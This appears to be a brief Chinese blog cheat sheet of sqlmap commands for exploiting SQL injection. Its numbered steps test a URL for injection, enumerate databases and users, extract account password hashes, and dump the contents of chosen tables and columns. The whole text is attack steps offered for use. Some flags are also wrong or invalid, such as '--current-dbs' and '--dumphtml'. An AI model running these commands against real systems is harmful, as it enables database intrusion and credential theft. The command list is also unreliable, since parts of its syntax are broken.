sqlmap經常使用注入點檢測&爆破命令

一、檢測注入點是否可用
python sqlmap.py -u "url"
二、從目標url爆破全部數據庫名
python sqlmap.py -u "url" --dbs
三、從目標url爆破當前數據庫名
python sqlmap.py -u "url" --current-dbs
四、列出數據庫全部用戶
python sqlmap.py -u "url" --users
五、列出數據庫帳戶密碼
python sqlmap.py -u "url" --passwords
六、列出指定數據庫的全部表名
python sqlmap.py -u "url" -D databasename --tables
七、列出指定表的全部字段名
python sqlmap.py -u "url" -D databasename -T tablename --columns --hex
八、列出指定字段內容
python sqlmap.py -u "url" -D databasename -T tablename -C columnname --dumphtml

 

參考文獻:https://www.freebuf.com/sectool/164608.htmlpython

相關文章
相關標籤/搜索